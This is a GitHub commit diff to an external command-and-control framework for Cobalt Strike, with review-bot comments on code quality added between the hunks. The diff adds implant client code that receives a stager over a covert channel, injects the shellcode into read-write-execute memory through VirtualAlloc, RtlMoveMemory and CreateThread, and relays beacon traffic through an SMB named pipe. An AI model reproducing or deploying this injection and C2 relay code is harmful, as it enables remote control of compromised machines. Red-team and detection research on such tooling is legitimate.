
added client modification that I forgot to push
Und3rf10w committed Jun 11, 2018
1 parent b9c2d42 commit 0c6b4f1
Showing 3 changed files with 155 additions and 123 deletions.
92 changes: 58 additions & 34 deletions skeletons/frameworks/cobalt_strike/client/clientcore/clientcore.py
Expand Up @@ -35,65 +35,85 @@
CDLL_NAME = ```[var:::cdll_name]```
CLIENT_ID = ```[var:::client_id]```

maxlen = 1024*1024
maxlen = 1024 * 1024
lib = CDLL(CDLL_NAME)

lib.start_beacon.argtypes = [c_char_p,c_int]
lib.start_beacon.argtypes = [c_char_p, c_int]
lib.start_beacon.restype = POINTER(HANDLE)


def start_beacon(payload):
return(lib.start_beacon(payload,len(payload)))
return (lib.start_beacon(payload, len(payload)))


lib.read_frame.argtypes = [POINTER(HANDLE),c_char_p,c_int]
lib.read_frame.argtypes = [POINTER(HANDLE), c_char_p, c_int]
lib.read_frame.restype = c_int


def ReadPipe(hPipe):
mem = create_string_buffer(maxlen)
l = lib.read_frame(hPipe,mem,maxlen)
if l < 0: return(-1)
chunk=mem.raw[:l]
return(chunk)
l = lib.read_frame(hPipe, mem, maxlen)
if l < 0: return (-1)
chunk = mem.raw[:l]
return (chunk)

lib.write_frame.argtypes = [POINTER(HANDLE),c_char_p,c_int]

lib.write_frame.argtypes = [POINTER(HANDLE), c_char_p, c_int]
lib.write_frame.restype = c_int
def WritePipe(hPipe,chunk):


def WritePipe(hPipe, chunk):
print "wp: %s\n" % len(chunk)
# print chunk # DEBUG
ret = lib.write_frame(hPipe,c_char_p(chunk),c_int(len(chunk)))
time.sleep(3)
print "ret=%s"%ret
return(ret)
ret = lib.write_frame(hPipe, c_char_p(chunk), c_int(len(chunk)))
sleep(3)
print "ret=%s" % ret
return (ret)


def task_encode(task):
return base64.b64encode(data)
return base64.b64encode(task)


def task_decode(task):
return base64.b64decode(data)
return base64.b64decode(task)


def notify_server():
print "Notifying server that we're ready for a stager"
# Construct the data frame
notification_data_frame = [CLIENT_ID, task_encode(C2_BLOCK_TIME)]
send_server_notification(notification_data_frame)
print "Notification that we're ready sent to server"
print "Notifying server that we're ready for a stager"
# Construct the data frame
notification_data_frame = [CLIENT_ID, task_encode(str(C2_BLOCK_TIME))]
print "notification_data_frame: "
preped_notify_data_frame = task_encode(str(notification_data_frame))
send_server_notification(preped_notify_data_frame)
print "Notification that we're ready sent to server"


def go():
print "Waiting for stager..." # DEBUG
p = recvData(CLIENT_ID)
print "Waiting for stager..." # DEBUG
p = retrieveData(CLIENT_ID)
# Convert this to a task frame
decoded_p = task_decode(p)
raw_task_frame = literal_eval(decoded_p)
decoded_task_frame = [raw_task_frame[0], task_decode(raw_task_frame[1])]

print "Got a stager! loading..."

# Wait a few seconds to give the stager a chance to load
sleep(2)

# Send the stager shellcode to the dll for injection and pipe creation
handle_beacon = start_beacon(p)
handle_beacon = start_beacon(decoded_task_frame[1])

# Grabbing and relaying the metadata from the SMB pipe is done during interact()
print "Loaded, and got handle to beacon. Getting METADATA."

return handle_beacon


def interact(handle_beacon):
while(True):
while (True):

# LOGIC TO CHECK FOR A CHUNK FROM THE BEACON
chunk = ReadPipe(handle_beacon)
if chunk < 0:
Expand All @@ -103,32 +123,36 @@ def interact(handle_beacon):
print "Received %d bytes from pipe" % (len(chunk))
print "relaying chunk to server"
resp_frame = [CLIENT_ID, task_encode(chunk)]
sendData(CLIENT_ID, resp_frame)
preped_resp_frame = task_encode(str(resp_frame))
sendData(CLIENT_ID, preped_resp_frame)

# LOGIC TO CHECK FOR A NEW TASK
print "Checking for new tasks from transport"

newTask = recvData()
newTask_frame = [newTask[0], task_decode(newTask[1])]

newTask = retrieveData(CLIENT_ID)
prep_new_task = task_decode(newTask)
raw_new_task = literal_eval(prep_new_task)
newTask_frame = [raw_new_task[0], task_decode(raw_new_task[1])]

print "Got new task: %s" % (newTask_frame[1])
print "Writing %s bytes to pipe" % (len(newTask_frame[1]))
r = WritePipe(handle_beacon, newTask_frame[1])
print "Wrote %s bytes to pipe" % (r)
sleep(C2_BLOCK_TIME/100) # python sleep is in seconds, C2_BLOCK_TIME in milliseconds
sleep(C2_BLOCK_TIME / 100) # python sleep is in seconds, C2_BLOCK_TIME in milliseconds


# Prepare the transport module
prepTransport()

# Notify the server that we're ready
notify_server()

#Get and inject the stager
# Get and inject the stager
handle_beacon = go()

# Run the main loop, keyboard escape available for debugging
try:
interact(handle_beacon)
except KeyboardInterrupt:
print "Caught escape signal"
exit(0)
exit(0)
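Review bot: `ReadPipe` returns the int `-1` when `lib.read_frame` fails but a `str` chunk otherwise, and `interact` tells them apart with `if chunk < 0:`, which only works because Python 2 orders every int below every str; under Python 3 the same `str < int` comparison raises `TypeError`, and nothing in the signature tells a reader that an int may come back in place of a chunk. Making the sentinel explicit is a two-line change: `if l < 0: return None` in `ReadPipe` and `if chunk is None:` in the loop. The top of `interact` and the body of that error branch sit between this file's two hunks, so I cannot see what the branch does on failure. Separately, the trailing comment on the final `sleep` says `C2_BLOCK_TIME` is in milliseconds while the code divides by 100 rather than 1000 (and Python 2 integer division truncates small values to 0); either the comment or the divisor should be corrected, here and in the second file's copy of the same line.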
Expand Up @@ -34,17 +34,19 @@
C2_BLOCK_TIME = int(```[var:::c2_block_time]```)
CLIENT_ID = ```[var:::client_id]```


def start_beacon(payload):
shellcode = bytearray(payload)
shellcode = bytearray(payload)
buf = (c_char * len(shellcode)).from_buffer(shellcode)
ptr = windll.kernel32.VirtualAlloc(c_int(0),
c_int(len(shellcode)),
c_int(0x3000), # MEM_COMMIT
c_int(0x40)) # PAGE_EXECUTE_READWRITE
c_int(0x3000), # MEM_COMMIT
c_int(0x40)) # PAGE_EXECUTE_READWRITE

windll.kernel32.RtlMoveMemory(c_int(ptr), buf, c_int(len(shellcode)))
windll.kernel32.CreateThread(None, c_int(0), c_int(ptr), None, c_int(0), None)


# Open the handle to the pipe
def open_handle():
GENERIC_READ = 0x80000000
Expand All @@ -54,70 +56,78 @@ def open_handle():
SECURITY_ANONYMOUS = 0x0
while 1:
pipe_handle = windll.kernel32.CreateFileA("\\\\.\\pipe" + ```[var:::c2_pipe_name]```,
GENERIC_READ|GENERIC_WRITE,
c_int(0),
None,
OPEN_EXISTING,
SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS,
None)
GENERIC_READ | GENERIC_WRITE,
c_int(0),
None,
OPEN_EXISTING,
SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS,
None)
if pipe_handle != -1:
break
return pipe_handle


def read_frame(handle):
print "Handle is: %s" % (str(handle))
result, size = win32file.ReadFile(handle, 4, None)
size = struct.unpack('<I', size)[0]
result, chunk = win32file.ReadFile(handle, size, None)
return chunk

def ReadPipe(handle):
return read_frame(handle)

def write_frame(handle, chunk):
wrote = c_int(0)
chunklen = len(chunk)
chunklen = struct.pack('<I', chunklen)
win32file.WriteFile(handle, chunklen, None)
win32file.WriteFile(handle, chunk, None)
return 0


def WritePipe(handle,chunk):
print "Writing to pipe: %s" %(chunk)
return write_frame(handle, chunk)

def task_encode(task):
return base64.b64encode(data)

def task_decode(task):
return base64.b64decode(data)

def notify_server():
print "Notifying server that we're ready for a stager"
# Construct the data frame
notification_data_frame = [CLIENT_ID, task_encode(C2_BLOCK_TIME)]
send_server_notification(notification_data_frame)
print "Notification that we're ready sent to server"

def go():
print "Waiting for stager..."
p = recvData(CLIENT_ID)
print "Got a stager! loading..."
sleep(2)
# Here they're writing the shellcode to the file, instead, we'll just send that to the handle...
beacon_thread = start_beacon(p)
handle_beacon = open_handle()
# Grabbing and relaying the metadata from the SMB pipe is done during interact()
print "Loaded, and got handle to beacon. Getting METADATA."

return handle_beacon

def interact(handle_beacon):
try:
while(True):

return pipe_handle

def read_frame(handle):
print "Handle is: %s" % (str(handle))
result, size = win32file.ReadFile(handle, 4, None)
size = struct.unpack('<I', size)[0]
result, chunk = win32file.ReadFile(handle, size, None)
return chunk

def ReadPipe(handle):
return read_frame(handle)

def write_frame(handle, chunk):
wrote = c_int(0)
chunklen = len(chunk)
chunklen = struct.pack('<I', chunklen)
win32file.WriteFile(handle, chunklen, None)
win32file.WriteFile(handle, chunk, None)
return 0

def WritePipe(handle, chunk):
print "Writing to pipe: %s" % (chunk)
return write_frame(handle, chunk)

def task_encode(task):
return base64.b64encode(task)

def task_decode(task):
return base64.b64decode(task)

def notify_server():
print "Notifying server that we're ready for a stager"
# Construct the data frame
notification_data_frame = [CLIENT_ID, task_encode(str(C2_BLOCK_TIME))]
print "notification_data_frame: "
preped_notify_data_frame = task_encode(str(notification_data_frame))
send_server_notification(preped_notify_data_frame)
print "Notification that we're ready sent to server"

def go():
print "Waiting for stager..." # DEBUG
p = retrieveData(CLIENT_ID)
# Convert this to a task frame
decoded_p = task_decode(p)
raw_task_frame = literal_eval(decoded_p)
decoded_task_frame = [raw_task_frame[0], task_decode(raw_task_frame[1])]

print "Got a stager! loading..."

# Wait a few seconds to give the stager a chance to load
sleep(2)

# Send the stager shellcode to the dll for injection and pipe creation
beacon_thread = start_beacon(decoded_task_frame[1])
handle_beacon = open_handle()

# Grabbing and relaying the metadata from the SMB pipe is done during interact()
print "Loaded, and got handle to beacon. Getting METADATA."

return handle_beacon

def interact(handle_beacon):
while (True):

# LOGIC TO CHECK FOR A CHUNK FROM THE BEACON
chunk = ReadPipe(handle_beacon)
if chunk < 0:
Expand All @@ -127,37 +137,35 @@ def interact(handle_beacon):
print "Received %d bytes from pipe" % (len(chunk))
print "relaying chunk to server"
resp_frame = [CLIENT_ID, task_encode(chunk)]
sendData(CLIENT_ID, resp_frame)
preped_resp_frame = task_encode(str(resp_frame))
sendData(CLIENT_ID, preped_resp_frame)

# LOGIC TO CHECK FOR A NEW TASK
print "Checking for new tasks from transport"

newTask = recvData(CLIENT_ID)

newTask_frame = [newTask[0], task_decode(newTask[1])]
newTask = retrieveData(CLIENT_ID)
prep_new_task = task_decode(newTask)
raw_new_task = literal_eval(prep_new_task)
newTask_frame = [raw_new_task[0], task_decode(raw_new_task[1])]

print "Got new task: %s" % (newTask_frame[1])
print "Writing %s bytes to pipe" % (len(newTask_frame[1]))
r = WritePipe(handle_beacon, newTask_frame[1])
print "Wrote %s bytes to pipe" % (r)
sleep(C2_BLOCK_TIME/100)
except KeyboardInterrupt:
print "Caught escape signal"
sys.exit(0)

sleep(C2_BLOCK_TIME / 100) # python sleep is in seconds, C2_BLOCK_TIME in milliseconds

# Prepare the transport module
prepTransport()
# Prepare the transport module
prepTransport()

# Notify the server that we're ready
notify_server()
# Notify the server that we're ready
notify_server()

#Get and inject the stager
handle_beacon = go()
# Get and inject the stager
handle_beacon = go()

# Run the main loop, keyboard escape available for debugging
try:
interact(handle_beacon)
except KeyboardInterrupt:
print "Caught escape signal"
exit(0)
# Run the main loop, keyboard escape available for debugging
try:
interact(handle_beacon)
except KeyboardInterrupt:
print "Caught escape signal"
exit(0)
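Review bot: In this pywin32 variant `interact` keeps the `if chunk < 0:` guard, but the `ReadPipe` → `read_frame` path in the hunk never returns a negative value: a failed or closed pipe surfaces as a `pywintypes.error` from `win32file.ReadFile` (or a `struct.error` if fewer than 4 length bytes arrive), so the error branch is dead and the loop ends by exception instead. Either catch those exceptions in `read_frame` and return the sentinel the caller expects, or drop the check and add a comment stating that read failures propagate out of `interact`. Relatedly, `write_frame` returns a constant `0` and leaves `wrote = c_int(0)` unused, so the `"Wrote %s bytes to pipe"` message always reports 0; returning `len(chunk)` (or the byte count `WriteFile` reports) would make that log truthful. The body of the `if chunk < 0:` branch lies between the two hunks of this file.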
Expand Up @@ -78,8 +78,8 @@ def sendData(task_frame):
# This will upload the data via the covert channel
# returns a confirmation that the data has been sent
beacon_id = task_frame[0]
# if config.debug:
# print (color("RAW DATA TO BE SENT: ", status=False, yellow=True) + "%s") % (task_frame)
if config.debug:
print (color("RAW DATA TO BE SENT: ", status=False, yellow=True) + "%s") % (task_frame)
# Prepares the data to be sent via the covert channel
new_task_frame = str([beacon_id, task_encode(task_frame[1])])
encoded_task_frame = task_encode((new_task_frame))
